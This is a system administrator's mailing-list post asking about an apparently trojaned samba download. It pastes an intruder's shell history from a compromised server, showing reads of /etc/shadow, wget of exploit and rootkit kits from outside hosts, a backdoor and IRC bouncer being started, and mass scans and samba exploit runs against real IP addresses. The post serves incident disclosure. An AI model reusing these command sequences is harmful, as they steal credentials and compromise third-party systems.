Faked samba packages / rootkit?
Does anybody know of these samba packages?
http://ftp.cvut.cz/samba/samba-latest.tar.gz
As far as I can see they are faked and contain some kind of rootkit (you can
see this in the shell history below). The server this history comes from has
been taken offline for security reasons, and nobody is there until 7th Jan,
so I can't give you more details.
144 w
145 cat /etc/issue
146 uname -a
147 cat /etc/shadow
148 cd /usr/lib
149 wget http://ftp.cvut.cz/samba/samba-latest.tar.gz
150 5tar zxvf samba-latest.tar.gz
151 tar zxvf samba-latest.tar.gz
152 rm -rf samba-latest.tar.gz
153 cd samba-3.0.0/
154 cd source/
155 ./configure
156 ./make
157 ls
158 make
159 w
160 ls
161 cd ..
162 cd ..
163 cd ..
164 cd ..
165 ls
166 cat /etc/shadows
167 cat /etc/shadow
168 cat /etc/hosts
169 cat /proc/cpuinfo
170 socklsit
171 sockslist
172 w
173 killall -9 in.identd
174 killall -9 smbd
175 killall -9 nmbd
176 smbd -D
177 nmbd -D
178 5 locate in.identd
179 locate in.identd
180 cd /var/tmp
181 ls
182 cd .nlp
183 wget geocities.com/st3lly/cmd.tg
184 wget http://geocities.com/st3lly/cmd.tg
185 wget http://geocities.com/st3lly/cmd.tgz
186 tar zxvf cmd.tgz
187 cd cmd
188 ls
189 ./stealth 0 193.95.215.54 6666 6668
190 ./stealth 193.95.215.54 6666 6668
191 ./stealth 193.95.215.54 6667
192 w
193 cd /var/tmp
194 cd .nlp
195 wget http://members.xoom.it/pippo46/selena.tgz
196 wget http://62.211.66.12/pippo46/selena.tgz
197 tar zxvf selena.tgz
198 rm selena
199 rm selena.tgz
200 cd selena/
201 ls
202 ./assl 212.213
203 uname -a
204 cd var/tmp/.nlp
205 ls
206 cd .nlp
207 cd /var/tmp
208 cd .nlp
209 ls
210 cd /tmp/
211 cd rk
212 ls
213 wget http://members.xoom.it/vendett/psymag.tar.gz
214 wget http://62.211.66.12/vendett/psymag.tar.gz
215 tar zxvf psymag.tar.gz
216 rm psymag.tar.gz
217 cd psybnc
218 wget http://62.211.66.12/vendett/psybnc.conf
219 ./psybnc
220 cd ..
221 rm -fr psybnc
222 wget http://62.211.66.12/pippo46/asmb.tar
223 tar zyvf asmb.tar
224 tar zxvf asmb.tar
225 rm asmb.tar
226 cd w00t/
227 ./asmb 120
228 ./asmb 110
229 ./asmb 217
230 ./asmb 217.229
231 cat woot.log
232 ./samba -b 0 -v 217.229.113.107
233 ./asmb 217.46
234 ./asmb 217.228
235 cd /tmp/rk
236 cd w00t/
237 ./asmb 194.142
238 ./samba -b 0 -v 194.142.156.50
239 ./asmb 195.165
240 ./asmb 195.240
241 ./asmb 195.80
242 cat woot.log
243 ./samba -b 0 -v 217.229.113.107
244 ./samba -b 0 -v 217.229.203.3
245 ./samba -b 0 -v 217.229.230.36
246 cd /tmp
247 ls
248 cd rk
249 cd w00t/
250 cat woot.log
251 ./samba -b 0 -v 81.182.126.85
252 ./samba -b 0 -v 81.182.126.85
253 cat woot.log
254 ./samba -b 0 -v 81.182.40.114
255 ./samba -b 0 -v 81.209
256 ./asmb 81.209
257 ./asmb 81.42
258 ./asmb 81.248
259 w
260 cd /var/tmp/.nlp
261 ls
262 cd ..
263 cd rk
264 cd /tmp/rk/.nlp
265 cd /tmp/
266 cd rk
267 cd .nlp
268 cd w00t/
269 ./asmb 195.97
270 ./asmb 195.166
271 ./asmb 81.183
272 cat woot.log
273 ./samba -b 0 -v 81.183.0.29
274 ./asmb 81.182
275 cat woot.log
276 ./samba -b 0 -v 81.182.40.114
277 ./samba -b 0 -v 81.182.40.114
278 ./samba -b 0 -v 81.182.40.114
279 ./samba -b 0 -v 81.182.90.152
280 cat woot.log
281 ./samba -b 0 -v 81.183.0.29
282 cat /proc/cpuinfo
283 cat /etc/hosts
284 w
285 cat /etc/issue
286 fuser -v 113/tcp
287 cat /etc/inetd.conf |grep -i ident
288 5vi /etc/inetd.conf
289 vi /etc/inetd.conf
290 vi /etc/inetd.conf
291 5killall -HUP inetd
292 killall -HUP inetd
293 cd /var/tmp
294 ls
295 cd /tmp
296 ls
297 cd rk
298 ls
299 cd ..
300 cd rk
301 wget http://members.xoom.it/vendett/psymag.tar.gz
302 wget http://62.211.66.12/vendett/psymag.tar.gz
303 tar zxvf psymag.tar.gz
304 ls
305 tar zxf psymag.tar.gz
306 tar zxvf psymag.tar.gz
307 tar xvfz psymag.tar.gz
308 rm psymag.tar.gz
309 ls
310 cd /usr/lib/.nlp
311 cd var/tmp
312 cd /var/tmp
313 ls
314 cd .nlp
315 ls
316 wget http://members.xoom.it/vendett/psymag.tar.gz
317 wget http://62.211.66.12/vendett/psymag.tar.gz
318 tar xvfz psymag.tar.gz
319 tar -xvfz psymag.tar.gz
320 rm psymag.tar.gz
321 w
322 wget http://62.211.66.12/pippo46/psy.tar.gz
323 tar zxvf psy.tar.gz
324 rm psy.tar.gz
325 wget http://62.211.66.12/pippo46/psyBNC2.3.1.tar
326 tar xf psyBNC2.3.1.tar
327 ls
328 cd psybnc.
329 cd psybnc
330 ls
331 wget http://62.211.66.12/pippo46/psybnc.conf
332 ./psybnc
333 ls
334 menuconf
335 ./menuconf
336 ./make
337 cd menuconf
338 ld
339 ld
340 ls
341 cd ..
342 ls
343 make
344 ls
345 ./psybnc
346 vi psybnc.conf
347 ./psybnc
348 vi psybnc.conf
349 ./psybnc
350 vi psybnc.conf
351 ./psybnc
352 cd ..
353 adduser
354 cd /tmo/rk/w00t
355 cd /tmp/rk/w00t
356 ./samba -b 0 -v 193.170.8.129
357 cd /tmp/rk/w00t
358 ./samba -b 0 -v 211.21.64.204
359 ./samba -b 0 -v 211.21.64.204
360 ./samba -b 0 -v 128.210.147.242
361 cd /tmp/rk/w00t
362 ./asmb 128.210
363 ./asmb 128.211
364 ./asmb 128.209
365 ./asmb 128
366 ./asmb 210.86
367 ./asmb 128
368 ./asmb 219
369 ./asmb 219.111
370 ./asmb 219.166
371 cat woot.log
372 ./samba -b 0 -v 219.166.79.186
373 ./samba -b 0 -v 219.166.81.34
374 ./asmb 219.80
375 cat woot.log
376 ./asmb 219.91
377 ./samba -b 0 -v 219.91.104.72
378 ./asmb 211.23
379 ./asmb 212.54
380 ./asmb 212.163
381 ./asmb 212.191
382 cd ..
383 wget xplo.150m.com/allsun.tgz
384 tar zxvf allsun.tgz
385 tar xf allsun.tgz
386 gunzip allsun.tgz
387 cd w00t/
388 ./asmb 10.12
389 ./asmb 212.37
390 ./asmb 215
391 ./asmb 189
392 ./asmb 140
393 ./asmb 82.129
394 ./asmb 82.39
395 cd /tmp/rk
396 cd w00t/
397 ./samba -b 0 -v 213.81.174.155
398 cat woot.log
399 cd ..
400 ls
401 cd w00t/
402 ./asmb 213.81
403 cd /var/tmp/.nlp
404 cd selena/
405 ls
406 ./ssx
407 cd /tmp
408 cd rk
409 cd w00t/
410 ./asmb 210
411 ./asmb 210.146
412 ./asmb 210.192
413 ls
414 ./samba -b 0 -v 128.210.147.242
415 ./samba -b 0 -v 128.210.147.241
416 ./samba -b 0 -v 128.210.147.243
417 ./samba -b 0 -v 128.210.147.241
418 ./samba -b 0 -v 128.210.147.242
419 ./samba -b 0 -v 128.210.147.242
420 ./asmb 210.233
421 ./samba -b 0 -v 210.233.23.147
422 ./asmb 210.59
423 ./asmb 211
424 ./asmb 211.130
425 cat woot.lo
426 ./asmb 211.21
427 cat woot.log
428 ./samba -b 0 -v 211.21.64.204
429 ./asmb 211.22
430 ./asmb 212
431 ./asmb 212.37
432 ./asmb 212.101
433 ./asmb 212.185
434 ./asmb 212.36
435 ./asmb 212.80
436 ./asmb 214
437 ./asmb 158
438 ./asmb 02
439 ./asmb 82
440 ./asmb 82.161
441 ./asmb 82.255
442 cd /tmp/rk/w00t
443 ls
444 ./asmb 83
445 ./asmb 193.40
446 ./asmb 212.28
447 ./asmb 172
448 ./asmb 172.163
449 ./asmb 62.218
450 ./asmb 61.189
451 ./asmb 63
452 ./asmb 62.233
453 ./asmb 62.146
454 ./asmb 62.140
455 ./asmb 62
456 ./asmb 62.174
457 ./asmb 62.32
458 ./asmb 62.57
459 ./asmb 62.90
460 ./asmb 207.44
461 ./asmb 213.64
462 ./asmb 213.52
463 ./asmb 213.60
464 cat woot.log
465 ./samba -b 0 -v 213.60.109.1
466 ./samba -b 0 -v 213.60.109.1
467 wget http://members.xoom.it/pippo46/php.tar
468 tar xf php.tar
469 ls
470 cd php.tar
471 cd ..
472 cd php.tar
473 wget http://members.xoom.it/pippo46/php.tar
474 tar xf php.tar
475 ls
476 wget http://62.211.66.12/pippo46/php.tar
477 ./Start 62.162
478 ls
479 tar xf php.tar
480 tar zxvf php.tar
481 5http://www.zorgii.0catch.com/phpxpl.tar.gz
482 wget http://www.zorgii.0catch.com/phpxpl.tar.gz
483 tar zxvf phpxpl.tar.gz
484 5gunzip phpxpl.tar.gz
485 gunzip phpxpl.tar.gz
486 cd w00t/
487 ./asmb 213.61
488 ./samba -b 0 -v 213.60.109.1
489 ./asmb 213.62
490 ./asmb 213.58
491 ./asmb 213.57
492 ./asmb 213.70
493 ./asmb 213.80
494 ./samba -b 0 -v 81.183.0.29
495 w
496 cd /var/tmp
497 cd /tmp/rk
498 cd w00t/
499 ./samba -b 0 -v 211.22.94.147
500 ./samba -b 0 -v 194.95.226.21
--
\\\ ||| /// _\=/_
( @ @ ) (o o)
+--------oOOo-(_)-oOOo--------------------------oOOo-(_)-oOOo------+
| Markus Schabel TGM - Die Schule der Technik www.tgm.ac.at |
| IT-Service A-1200 Wien, Wexstrasse 19-23 net.tgm.ac.at |
| markus.schabel@tgm.ac.at Tel.: +43(1)33126/316 |
| markus.schabel@members.fsf.org Fax.: +43(1)33126/154 |
| FSF Associate Member #597, Linux User #259595 (counter.li.org) |
| oOOo Yet Another Spam Trap: oOOo |
| ( ) oOOo yast@tgm.ac.at ( ) oOOo |
+--------\ (----( )--------------------------\ ( -----( )-----+
\_) ) / \_) ) /
(_/ (_/
Computers are like airconditioners:
They stop working properly if you open windows.